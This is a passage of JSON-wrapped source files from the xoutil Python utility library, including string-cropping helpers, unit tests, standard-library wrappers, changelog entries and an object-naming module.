versionadded:: 1.8.0\n\n \"\"\"\n from functools import partial\n\n max_width = _check_max_width(max_width, caller=\"crop\")\n if isinstance(obj, str):\n res = obj # TODO: reduce\n else:\n oper = getattr(obj, OPERATOR_NAME, partial(_crop, obj))\n if isinstance(oper, str):\n # XXX: Allowing to define expecting operator as a static resulting\n # string\n res = oper\n elif callable(oper):\n # XXX: I don't remember anymore why this check is needed\n if getattr(oper, \"__self__\", \"OK\") is not None:\n try:\n res = oper(max_width=max_width, canonical=canonical)\n except TypeError:\n # Just preventing operator definition with no extra\n # parameters\n res = oper()\n else:\n res = NotImplemented\n else:\n msg = \"crop() invalid '{}' type: {}\"\n raise TypeError(msg.format(OPERATOR_NAME, type(oper).__name__))\n return res\n\n\ndef _crop(obj, max_width=None, canonical=False):\n \"\"\"Internal crop tool.\"\"\"\n from collections import Set, Mapping\n\n res = repr(obj) if canonical else str(obj)\n if (res.startswith(\"<\") and res.endswith(\">\")) or len(res) > max_width:\n try:\n res = obj.__name__\n if res == _LAMBDA_NAME and not canonical:\n # Just a gift\n res = res.replace(_LAMBDA_NAME, \"λ\")\n except AttributeError:\n if isinstance(obj, (tuple, list, Set, Mapping)):\n res = crop_iterator(obj, max_width, canonical)\n else:\n res = \"{}({})\".format(type(obj).__name__, ELLIPSIS)\n return res\n\n\ndef crop_iterator(obj, max_width=None, canonical=False):\n \"\"\"Return a reduced string representation of the iterator `obj`.\n\n See `crop`:func: function for a more general tool.\n\n If `max_width` is not given, defaults to ``DEFAULT_MAX_WIDTH``.\n\n .. 
versionadded:: 1.8.0\n\n \"\"\"\n from collections import Set, Mapping\n\n max_width = _check_max_width(max_width, caller=\"crop_iterator\")\n classes = (tuple, list, Mapping, Set)\n cls = next((c for c in classes if isinstance(obj, c)), None)\n if cls:\n res = \"\"\n if cls is Set and not obj:\n borders = (\"{}(\".format(type(obj).__name__), \")\")\n else:\n borders = (\"()\", \"[]\", \"{}\", \"{}\")[classes.index(cls)]\n UNDEF = object()\n sep = \", \"\n if cls is Mapping:\n iteritems = lambda d: iter(d.items())\n\n def itemrepr(item):\n key, value = item\n return \"{}: {}\".format(repr(key), repr(value))\n\n else:\n iteritems = iter\n itemrepr = repr\n items = iteritems(obj)\n ok = True\n while ok:\n item = next(items, UNDEF)\n if item is not UNDEF:\n if res:\n res += sep\n aux = itemrepr(item)\n if len(res) + len(borders) + len(aux) <= max_width:\n res += aux\n else:\n res += ELLIPSIS\n ok = False\n else:\n ok = False\n return \"{}{}{}\".format(borders[0], res, borders[1])\n else:\n raise TypeError(\n \"crop_iterator() expects tuple, list, set, or \"\n \"mapping; got {}\".format(type(obj).__name__)\n )\n\n\n# aliases\nshort = small = crop # noqa\n" }, { "alpha_fraction": 0.5772425532341003, "alphanum_fraction": 0.579734206199646, "avg_line_length": 29.100000381469727, "blob_id": "f0c6d1a675e1dfb7b068d6b962559bdfcf6c011c", "content_id": "19147b279734bbbd89de3ec31911a2cc99441173", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2409, "license_type": "no_license", "max_line_length": 88, "num_lines": 80, "path": "/tests/test_symbols.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\nimport 
unittest\nfrom xoutil.symbols import boolean\n\n\nclass BooleanTests(unittest.TestCase):\n def test_singletons(self):\n from sys import intern\n from xoutil.symbols import Unset\n\n foo = \"Un\"\n bar = \"set\"\n a = boolean(\"Unset\")\n b = boolean(foo + \"set\")\n c = boolean(\"Un\" + bar)\n\n # self.assertIs(intern(foo + bar), repr(Unset))\n # above started to fail in PyPy, changed to next.\n self.assertIs(intern(foo + bar), intern(repr(Unset)))\n self.assertIs(repr(a), repr(b))\n self.assertIs(a, Unset)\n self.assertIs(b, Unset)\n self.assertIs(c, Unset)\n\n def test_equality(self):\n a = boolean(\"false\")\n b = boolean(\"true\", True)\n self.assertEqual(a, False)\n self.assertEqual(b, True)\n self.assertEqual(not b, False)\n\n def test_parse(self):\n a = boolean(\"false\")\n b = boolean(\"true\", True)\n c = boolean.parse(repr(a))\n self.assertIs(boolean.parse(\"false\"), a)\n self.assertIs(boolean.parse(\"true\"), b)\n self.assertIs(a, c)\n\n def test_int_compatibility(self):\n a = boolean(\"false\")\n b = boolean(\"true\", True)\n self.assertEqual(a + 1, 1)\n self.assertEqual(b + 1, 2)\n\n def test_comments(self):\n a = boolean(\"false\")\n value = \"%s # This is a comment\" % a\n b = boolean.parse(value)\n self.assertIs(a, b)\n\n def test_symbols_are_pickable(self):\n import pickle\n from xotl.tools.symbols import Unset, Undefined\n\n for protocol in range(pickle.DEFAULT_PROTOCOL, pickle.HIGHEST_PROTOCOL + 1):\n self.assertIs(Unset, pickle.loads(pickle.dumps(Unset, protocol)))\n self.assertIs(Undefined, pickle.loads(pickle.dumps(Undefined, protocol)))\n\n\ndef test_symbols_is_importable():\n import sys\n\n modules = {mod: sys.modules[mod] for mod in sys.modules if mod.startswith(\"xoutil\")}\n for mod in modules:\n sys.modules.pop(mod)\n try:\n import xoutil.symbols # noqa\n finally:\n for modname, mod in modules.items():\n sys.modules[modname] = mod\n" }, { "alpha_fraction": 0.6013363003730774, "alphanum_fraction": 0.602449893951416, "avg_line_length": 
29.965517044067383, "blob_id": "642ccc5d47c4d1391c5b4f61e8ca9d3c1f52062e", "content_id": "d1905dec982d09f8bc1fe8f99494066eb94c808d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 899, "license_type": "no_license", "max_line_length": 79, "num_lines": 29, "path": "/xotl/tools/future/subprocess.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions the `subprocess` module in the standard library.\"\"\"\n\n\nfrom subprocess import * # noqa\nfrom subprocess import __all__, Popen, PIPE # noqa\n\n__all__ = list(__all__) + [\"call_and_check_output\"]\n\n\ndef call_and_check_output(*popenargs, **kwargs):\n \"\"\"Combines `call` and `check_output`. 
Returns a tuple ``(returncode,\n output, err_output)``.\n\n \"\"\"\n if \"stdout\" in kwargs:\n raise ValueError(\"stdout argument not allowed, it will be overridden.\")\n process = Popen(stdout=PIPE, *popenargs, **kwargs)\n output, err = process.communicate()\n retcode = process.poll()\n return (retcode, output, err)\n" }, { "alpha_fraction": 0.5681588649749756, "alphanum_fraction": 0.5725345015525818, "avg_line_length": 32.382022857666016, "blob_id": "118ae999f905e6435be31f5a4a505551a022c164", "content_id": "b18619cecadeda0bcd7fd0f811b5379f35efe810", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2972, "license_type": "no_license", "max_line_length": 77, "num_lines": 89, "path": "/tests/test_fs.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tests for xoutil.fs module\"\"\"\n\nimport os\nimport unittest\nimport tempfile\nimport shutil\n\n# Makes sure our package is always importable\n# sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),\n# '..', '..')))\n\n\nclass TestFs(unittest.TestCase):\n def setUp(self):\n # Makes all names predictable\n pjoin = os.path.join\n self.previous_dir = os.getcwd()\n self.base = base = tempfile.mkdtemp(prefix=\"xoutiltests-\")\n os.makedirs(pjoin(base, \"A\", \"B\", \"C\"))\n os.makedirs(pjoin(base, \"A\", \"D\", \"E\"))\n os.makedirs(pjoin(base, \"A\", \"F\"))\n self.files = files = []\n\n wexpected = self.walk_up_expected = pjoin(self.base, \"A\")\n sentinel = tempfile.mkstemp(prefix=\"X\", dir=wexpected)\n self.sentinel = os.path.basename(sentinel[-1])\n files.append(sentinel) # For testing `walk_up`\n files.append(\n 
tempfile.mkstemp(prefix=\"M\", dir=pjoin(self.base, \"A\", \"B\"))\n )\n files.append(\n tempfile.mkstemp(prefix=\"P\", dir=pjoin(self.base, \"A\", \"B\"))\n )\n wstart = self.walk_up_start = pjoin(self.base, \"A\", \"B\", \"C\")\n files.append(tempfile.mkstemp(prefix=\"z\", dir=wstart))\n files.append(\n tempfile.mkstemp(suffix=\"ending\", dir=pjoin(self.base, \"A\", \"D\"))\n )\n files.append(\n tempfile.mkstemp(prefix=\"Z\", dir=pjoin(self.base, \"A\", \"F\"))\n )\n\n def test_iter_files_with_regex_pattern(self):\n from xoutil.fs import iter_files\n\n res = list(iter_files(self.base, \"(?xi)/Z\"))\n self.assertEqual(2, len(res))\n self.assertIn(self.files[-3][-1], res)\n self.assertIn(self.files[-1][-1], res)\n\n def test_iter_files_with_maxdepth(self):\n from xoutil.fs import iter_files\n\n res = list(iter_files(self.base, \"(?xi)/Z\", maxdepth=3))\n self.assertEqual(1, len(res))\n self.assertIn(self.files[-1][-1], res)\n res = list(iter_files(self.base, \"(?xi)/Z\", maxdepth=2))\n self.assertEqual(0, len(res))\n\n def test_walk_up(self):\n from xoutil.fs import walk_up\n\n expected, start = self.walk_up_expected, self.walk_up_start\n sentinel = self.sentinel\n self.assertEqual(expected, walk_up(start, sentinel))\n\n def test_ensure_filename(self):\n from xoutil.fs import ensure_filename\n\n filename = os.path.join(self.base, \"en\", \"sure\", \"filename.txt\")\n ensure_filename(filename)\n self.assertTrue(os.path.isfile(filename))\n\n def tearDown(self):\n shutil.rmtree(self.base)\n os.chdir(self.previous_dir)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.5732410550117493, "avg_line_length": 23.08333396911621, "blob_id": "f2a5971b7c3f2ec0a4a125f18ca2ecdad4550c7f", "content_id": "5932d7834b65cd9af5104961684b402b9fff13d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 868, "license_type": "no_license", "max_line_length": 72, 
"num_lines": 36, "path": "/xotl/tools/future/pprint.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Enhanced data pretty printer.\"\"\"\n\nfrom pprint import * # noqa\nfrom pprint import __all__, pprint # noqa\n\n__all__ = list(__all__) + [\"ppformat\"]\n\n\ndef ppformat(obj):\n \"\"\"Just like `pprint`:func: but always returning a result.\n\n :returns: The pretty formated text.\n :rtype: `unicode` in Python 2, `str` in Python 3.\n\n \"\"\"\n import io\n\n stream = io.StringIO()\n pprint(obj, stream=stream)\n stream.seek(0)\n res = stream.read()\n if isinstance(res, str):\n return res\n else:\n from xotl.tools.future.codecs import safe_decode\n\n return safe_decode(res)\n" }, { "alpha_fraction": 0.70652174949646, "alphanum_fraction": 0.717391312122345, "avg_line_length": 35.79999923706055, "blob_id": "f7c1bfa953bde96644893b6447a63216b46e2508", "content_id": "58002ba90b9f7ca037b74e7b0a14ba4bb85fb573", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 184, "license_type": "permissive", "max_line_length": 75, "num_lines": 5, "path": "/docs/source/history/_changes-1.7.10.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #6: `TimeSpan.overlaps <xoutil.datetime.TimeSpan.overlaps>`:meth:\n was incorrectly defined.\n\n- Fix bug #5: `~xoutil.datetime.TimeSpan`:class: can't have a `union`\n method.\n" }, { "alpha_fraction": 0.727215588092804, "alphanum_fraction": 0.727215588092804, "avg_line_length": 32.8510627746582, "blob_id": "aa98c944a4dfe881206475423f683136e29a15ab", "content_id": 
"4c74adedfc9be95789a50da4222e58820721ea21", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1591, "license_type": "permissive", "max_line_length": 78, "num_lines": 47, "path": "/docs/source/history/_changes-2.1.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Repackage ``xoutil`` under `xotl.tools`:mod:. You can still import from the\n `xoutil namespace<xoutil>`:mod:.\n\n- Remove deprecated module ``xoutil.logger``.\n\n- Remove package ``xoutil.eight``.\n\n- Remove deprecated ``xoutil.decorator.memoized_property``, use\n `xotl.tools.objects.memoized_property`:class:.\n\n- Remove deprecated functions and classes ``xoutil.future.inspect.type_name``,\n ``xoutil.future.functools.ctuple``, and ``xoutil.future.functools.compose``.\n\n- Remove deprecated top-level imports: ``xoutil.Unset``, ``xoutil.Undefined``,\n ``xoutil.Ignored`` and ``xoutil.Invalid``.\n\n- Add `xotl.tools.deprecation.deprecated_alias`:func:.\n\n- Allow to customize Quantity in `xotl.tools.dim.meta.Dimension`:class: and,\n by argument, in `~xotl.tools.dim.meta.Dimension.new`:meth:.\n\n- Deprecate ``xoutil.future.itertools.zip()``, and\n ``xoutil.future.itertools.map()``.\n\n- Re-implement `xotl.tools.future.itertools.merge`:func: in terms of\n `heapq.merge`:func:.\n\n- Add `xotl.tools.tasking.get_backoff_wait`:func:\n\n- Add `xotl.tools.objects.iter_final_subclasses`:func:,\n `xotl.tools.objects.get_final_subclasses`:func: and\n `xotl.tools.objects.FinalSubclassEnumeration`:func:.\n\n- Deprecate module ``xotl.tools.progress``.\n\n- Deprecate module ``xotl.tools.values.ids``.\n\n- Deprecate ``xotl.tools.web.slugify``; use `xotl.tools.strings.slugify`:func:\n instead.\n\n- Remove deprecated module ``xotl.tools.uuid``.\n\n- Remove deprecated module ``xotl.tool.logical``.\n\n- Remove deprecated module ``xotl.tools.formatter``.\n\n- Remove 
deprecated function ``xotl.tools.tools.get_default``.\n" }, { "alpha_fraction": 0.6033898591995239, "alphanum_fraction": 0.6081355810165405, "avg_line_length": 30.382978439331055, "blob_id": "ed3d0b5f8ab103369820d4e7505226e758671afc", "content_id": "8cc94f583ae9ba9809785ef12362b998edf0fb60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 78, "num_lines": 47, "path": "/xotl/tools/future/textwrap.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Text wrapping and filling.\"\"\"\n\nfrom textwrap import * # noqa\nimport textwrap as _stdlib\nfrom textwrap import __all__ # noqa\n\n__all__ = list(__all__)\n\n\ndef dedent(text, skip_firstline=False):\n r\"\"\"Remove any common leading whitespace from every line in text.\n\n This can be used to make triple-quoted strings line up with the left edge\n of the display, while still presenting them in the source code in indented\n form.\n\n Note that tabs and spaces are both treated as whitespace, but they are not\n equal: the lines ``\"    hello\"`` and ``\"\\thello\"`` are considered to have\n no common leading whitespace.\n\n If `skip_firstline` is True, the first line is separated from the rest of\n the body. This helps with docstrings that follow `257`:pep:.\n\n .. 
warning:: The `skip_firstline` argument is missing in standard library.\n\n \"\"\"\n if skip_firstline:\n parts = text.split(\"\\n\", 1)\n if len(parts) > 1:\n subject, body = parts\n else:\n subject, body = parts[0], \"\"\n result = _stdlib.dedent(subject)\n if body:\n result += \"\\n\" + _stdlib.dedent(body)\n else:\n result = _stdlib.dedent(text)\n return result\n" }, { "alpha_fraction": 0.6931818127632141, "alphanum_fraction": 0.6931818127632141, "avg_line_length": 43, "blob_id": "77e76c55572c02d3181f9c79346abbc0eb5fadc2", "content_id": "3db59a148cf3524fa3f8d3cd6c8eb0d21b549141", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 88, "license_type": "permissive", "max_line_length": 74, "num_lines": 2, "path": "/docs/source/history/_changes-1.6.10.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix `repr`:func: and `str`:func: issues with `xoutil.cli.Command`:class:\n instances.\n" }, { "alpha_fraction": 0.5645127296447754, "alphanum_fraction": 0.5682082176208496, "avg_line_length": 30.622705459594727, "blob_id": "bb7b6f7920beae76dfc24e355b2dbaeec1577797", "content_id": "4d25ae99355b97cae6765dbb342a35918bce570e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18943, "license_type": "no_license", "max_line_length": 82, "num_lines": 599, "path": "/xotl/tools/names.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"A protocol to obtain or manage object names.\"\"\"\n\n# FIX: These imports must be local\nfrom xotl.tools.symbols 
import Undefined as _undef\n\n\n# TODO: This module must be reviewed and deprecate most of it.\n\n\ndef _get_mappings(source):\n \"\"\"Return a sequence of mappings from `source`.\n\n Source could be a stack frame, a single dictionary, or any sequence of\n dictionaries.\n\n \"\"\"\n from collections import Mapping\n\n if isinstance(source, Mapping):\n return (source,)\n else:\n from xotl.tools.future.inspect import get_attr_value\n\n l = get_attr_value(source, \"f_locals\", _undef)\n g = get_attr_value(source, \"f_globals\", _undef)\n if isinstance(l, Mapping) and isinstance(g, Mapping):\n return (l,) if l is g else (l, g)\n else:\n return tuple(source)\n\n\ndef _key_for_value(source, value, strict=True):\n \"\"\"Returns the tuple (key, mapping) where the \"value\" is found.\n\n if strict is True, then look first for the same object::\n >>> x = [1]\n >>> y = [1] # equal to `x` but not the same\n >>> src = {'x': x, 'y': y}\n >>> search = lambda o, strict=True: _key_for_value(src, o, strict)\n >>> search(x) == search(y)\n False\n >>> search(x, strict=False) == search(y, strict=False)\n True\n\n This is mainly intended to find object names in stack frame variables.\n\n Source could be a stack frame, a single dictionary, or any sequence of\n dictionaries.\n\n \"\"\"\n source = _get_mappings(source)\n found, equal = _undef, (None, {})\n i, mapping_count = 0, len(source)\n while found is _undef and (i < mapping_count):\n mapping = source[i]\n keys = list(mapping)\n j, key_count = 0, len(keys)\n while found is _undef and (j < key_count):\n key = keys[j]\n item = mapping[key]\n if item is value:\n found = key, mapping\n elif value == item:\n if strict:\n equal = key, mapping\n else:\n found = key, mapping\n j += 1\n i += 1\n return found if found is not _undef else equal\n\n\ndef _get_value(source, key, default=None):\n \"\"\"Returns the value for the given `key` in `source` mappings.\n\n This is mainly intended to obtain object values in stack frame variables.\n\n Source 
could be a stack frame, a single dictionary, or any sequence of\n dictionaries.\n\n \"\"\"\n source = _get_mappings(source)\n res = _undef\n i, mapping_count = 0, len(source)\n while res is _undef and (i < mapping_count):\n mapping = source[i]\n res = mapping.get(key, _undef)\n i += 1\n return res if res is not _undef else default\n\n\ndef _get_best_name(names, safe=False, full=False):\n \"\"\"Get the best name in the give list of `names`.\n\n Best names are chosen in the following order (from worst to best):\n\n - Any string\n - A valid slug\n - A valid protected identifier\n - A valid public identifier\n - A valid full identifier\n\n If a string in the list `names` contains the substring \"%(next)s\", then\n the algorithm recurses to find the best name of the remaining names first\n and substitutes the substring with the result, the remaining names are\n then pruned from the search.\n\n If `safe` is True, returned name must be a valid identifier. If `full` is\n True (halted if `safe` is not True) then the returned name must a valid\n full identifier.\n\n \"\"\"\n from xotl.tools.validators import (\n is_valid_full_identifier,\n is_valid_public_identifier,\n is_valid_identifier,\n is_valid_slug,\n )\n\n names = list(names)\n\n def inner(start=0):\n ok, best_idx, best_qlty = start, -1, 0\n i, count = start, len(names)\n assert start < count, 'start is \"%s\", max is \"%s\".' 
% (start, count)\n while i < count:\n name = names[i]\n if \"%(next)s\" in name:\n next = inner(i + 1)\n names[i] = name % {\"next\": next}\n count = i + 1\n else:\n if is_valid_slug(name):\n qlty = 25\n if is_valid_identifier(name):\n qlty = 75 if is_valid_public_identifier(name) else 50\n elif is_valid_full_identifier(name):\n qlty = 100\n else:\n qlty = -25\n if best_qlty <= qlty:\n best_idx = i\n best_qlty = qlty\n ok = i\n i += 1\n idx = best_idx if best_idx >= 0 else ok\n return names[idx]\n\n res = inner()\n if safe:\n # TODO: Improve these methods to return False of reserved identifiers\n is_valid = is_valid_full_identifier if full else is_valid_identifier\n if not is_valid(res):\n from xotl.tools.string import slugify\n\n _mark = \"dot_dot_dot\"\n full = full and \".\" in res\n if full:\n res = res.replace(\".\", _mark)\n res = slugify(res, \"_\")\n if full:\n res = res.replace(_mark, \".\")\n if not is_valid(res):\n res = \"_\" + res\n return str(res)\n\n\ndef module_name(item):\n \"\"\"Returns the full module name where the given object is declared.\n\n Examples::\n\n >>> module_name(module_name)\n 'xotl.tools.names'\n\n >>> from xotl.tools.symbols import Unset\n >>> module_name(Unset)\n 'xotl.tools.symbols'\n\n \"\"\"\n from xotl.tools.future.inspect import get_attr_value\n\n if item is None:\n res = \"\"\n elif isinstance(item, str):\n res = item\n else:\n res = get_attr_value(item, \"__module__\", None)\n if res is None:\n res = get_attr_value(type(item), \"__module__\", \"\")\n if res.startswith(\"__\") or res in (\"builtins\", \"exceptions\", \"<module>\"):\n res = \"\"\n return str(res)\n\n\ndef simple_name(item, join=True):\n \"\"\"Returns the simple name for the given object.\n\n :param join: If False, only the object inner name is returned; if it is a\n callable is used similar to a string join receiving a tuple of\n (module-name, inner-name) as argument; True means (is equivalent\n to)::\n\n join = lambda arg: '.'.join(arg).strip('.')\n\n For 
example, use ``lambda arg: arg`` to return the 2-tuple itself.\n\n See `module_name`:func: for more information when a not False value\n is used.\n\n Examples::\n\n >>> simple_name(simple_name)\n 'xotl.tools.names.simple_name'\n\n >>> from xotl.tools.symbols import Unset\n >>> simple_name(Unset)\n 'xotl.tools.symbols.Unset'\n\n This function is intended for named objects (those with the `__name__`\n attribute), if an object without standard name is used, the type name is\n returned instead; for example::\n\n >>> simple_name(0)\n 'int'\n\n To get a name in a more precise way, use `nameof`:func:.\n\n \"\"\"\n # TODO: deprecate `join` argument\n from xotl.tools.future.inspect import safe_name\n\n singletons = (None, True, False, Ellipsis, NotImplemented)\n res = next((str(s) for s in singletons if s is item), None)\n if res is None:\n res = safe_name(item)\n if res is None:\n item = type(item)\n res = safe_name(item)\n if join:\n if join is True:\n\n def join(arg):\n return str(\".\".join(arg).strip(\".\"))\n\n res = join((module_name(item), res))\n return res\n\n\ndef nameof(*args, **kwargs):\n \"\"\"Obtain the name of each one of a set of objects.\n\n .. versionadded:: 1.4.0\n\n .. versionchanged:: 1.6.0\n\n - Keyword arguments are now keyword-only arguments.\n\n - Support for several objects\n\n - Improved the semantics of parameter `full`.\n\n - Added the `safe` keyword argument.\n\n If no object is given, None is returned; if only one object is given, a\n single string is returned; otherwise a list of strings is returned.\n\n The name of an object is normally the variable name in the calling stack.\n\n If the object is not present calling frame, up to five frame levels are\n searched. 
Use the `depth` keyword argument to specify a different\n starting point and the search will proceed five levels from this frame up.\n\n If the same object has several good names a single one is arbitrarily\n chosen.\n\n Good names candidates are retrieved based on the keywords arguments\n `full`, `inner`, `safe` and `typed`.\n\n If `typed` is True and the object is not a type name or a callable (see\n `xotl.tools.future.inspect.safe_name`:func:), then the `type` of the\n object is used instead.\n\n If `inner` is True we try to extract the name by introspection instead of\n looking for the object in the frame stack.\n\n If `full` is True the full identifier of the object is preferred. In this\n case if `inner` is False the local-name for the object is found. If\n `inner` is True, find the import-name.\n\n If `safe` is True, returned value is converted -if it is not- into a valid\n Python identifier, though you should not trust this identifier resolves to\n the value.\n\n See `the examples in the documentation <name-of-narrative>`:ref:.\n\n .. warning:: The names of objects imported from 'xoutil' are still in the\n namespace 'xotl.tools'.\n\n \"\"\"\n # XXX: The examples are stripped from here. 
Go the documentation page.\n from numbers import Number\n from xotl.tools.future.inspect import safe_name\n\n arg_count = len(args)\n names = [[] for i in range(arg_count)]\n\n params = kwargs\n idx = 0\n\n def grant(name=None, **again):\n nonlocal params\n nonlocal idx\n if name:\n names[idx].append(name)\n assert len(names[idx]) < 5\n if again:\n params = dict(kwargs, **again)\n else:\n params = kwargs\n idx += 1\n\n def param(name, default=False):\n nonlocal params\n return params.get(name, default)\n\n while idx < arg_count:\n item = args[idx]\n if param(\"typed\") and not safe_name(item):\n item = type(item)\n if param(\"inner\"):\n res = safe_name(item)\n if res:\n if param(\"full\"):\n head = module_name(item)\n if head:\n res = \".\".join((head, res))\n grant(res)\n elif isinstance(item, (str, Number)):\n grant(str(item))\n else:\n grant(\"@\".join((\"%(next)s\", hex(id(item)))), typed=True)\n else:\n import sys\n\n sf = sys._getframe(param(\"depth\", 1))\n try:\n i, LIMIT, res = 0, 5, _undef\n _full = param(\"full\")\n while not res and sf and (i < LIMIT):\n key, mapping = _key_for_value(sf, item)\n if key and _full:\n head = module_name(_get_value(mapping, \"__name__\"))\n if not head:\n head = module_name(sf.f_code.co_name)\n if not head:\n head = module_name(item) or None\n else:\n head = None\n if key:\n res = key\n else:\n sf = sf.f_back\n i += 1\n finally:\n # TODO: on \"del sf\" Python says \"SyntaxError: can not delete\n # variable 'sf' referenced in nested scope\".\n sf = None\n if res:\n grant(\".\".join((head, res)) if head else res)\n else:\n res = safe_name(item)\n if res:\n grant(res)\n else:\n grant(None, inner=True)\n for i in range(arg_count):\n names[i] = _get_best_name(names[i], safe=param(\"safe\"))\n if arg_count == 0:\n return None\n elif arg_count == 1:\n return names[0]\n else:\n return names\n\n\ndef identifier_from(*args):\n \"\"\"Build an valid identifier from the name extracted from an object.\n\n .. 
versionadded:: 1.5.6\n\n First, check if argument is a type and then returns the name of the type\n prefixed with `_` if valid; otherwise calls `nameof` function repeatedly\n until a valid identifier is found using the following order logic:\n ``inner=True``, without arguments looking-up a variable in the calling\n stack, and ``typed=True``. Returns None if no valid value is found.\n\n Examples::\n\n >>> identifier_from({})\n 'dict'\n\n \"\"\"\n if len(args) == 1:\n from xotl.tools.validators.identifiers import is_valid_identifier as valid\n from xotl.tools.future.inspect import get_attr_value\n\n res = None\n if isinstance(args[0], type):\n aux = get_attr_value(args[0], \"__name__\", None)\n if valid(aux):\n res = str(\"_%s\" % aux)\n if res is None:\n tests = ({\"inner\": True}, {}, {\"typed\": True})\n names = (nameof(args[0], depth=2, **test) for test in tests)\n res = next((name for name in names if valid(name)), None)\n return res\n else:\n msg = \"identifier_from() takes exactly 1 argument (%s given)\"\n raise TypeError(msg % len(args))\n\n\nclass namelist(list):\n \"\"\"Similar to list, but only intended for storing object names.\n\n Constructors:\n\n * namelist() -> new empty list\n * namelist(collection) -> new list initialized from collection's items\n * namelist(item, ...) -> new list initialized from severals items\n\n Instances can be used as decorators to store names of module items\n (functions or classes)::\n\n >>> __all__ = namelist()\n >>> @__all__\n ... def foobar(*args, **kwargs):\n ... 
'Automatically added to this module \"__all__\" names.'\n\n >>> 'foobar' in __all__\n True\n\n \"\"\"\n\n def __init__(self, *args):\n if len(args) == 1:\n from types import GeneratorType as gtype\n\n if isinstance(args[0], (tuple, list, set, frozenset, gtype)):\n args = args[0]\n super().__init__(nameof(arg, depth=2) for arg in args)\n\n def __add__(self, other):\n other = [nameof(item, depth=2) for item in other]\n return super().__add__(other)\n\n __iadd__ = __add__\n\n def __contains__(self, item):\n return super().__contains__(nameof(item, inner=True))\n\n def append(self, value):\n \"\"\"l.append(value) -- append a name object to end\"\"\"\n super().append(nameof(value, depth=2))\n return value # What allow to use its instances as a decorator\n\n __call__ = append\n\n def extend(self, items):\n \"\"\"l.extend(items) -- extend list by appending items from the iterable\n \"\"\"\n items = (nameof(item, depth=2) for item in items)\n return super().extend(items)\n\n def index(self, value, *args):\n \"\"\"l.index(value, [start, [stop]]) -> int -- return first index of name\n\n Raises ValueError if the name is not present.\n\n \"\"\"\n return super().index(nameof(value, depth=2), *args)\n\n def insert(self, index, value):\n \"\"\"l.insert(index, value) -- insert object before index\n \"\"\"\n return super().insert(index, nameof(value, depth=2))\n\n def remove(self, value):\n \"\"\"l.remove(value) -- remove first occurrence of value\n\n Raises ValueError if the value is not present.\n\n \"\"\"\n return list.remove(self, nameof(value, depth=2))\n\n\nclass strlist(list):\n \"\"\"Similar to list, but only intended for storing ``str`` instances.\n\n Constructors:\n * strlist() -> new empty list\n * strlist(collection) -> new list initialized from collection's items\n * strlist(item, ...) -> new list initialized from severals items\n\n Last versions of Python 2.x has a feature to use unicode as standard\n strings, but some object names can be only ``str``. 
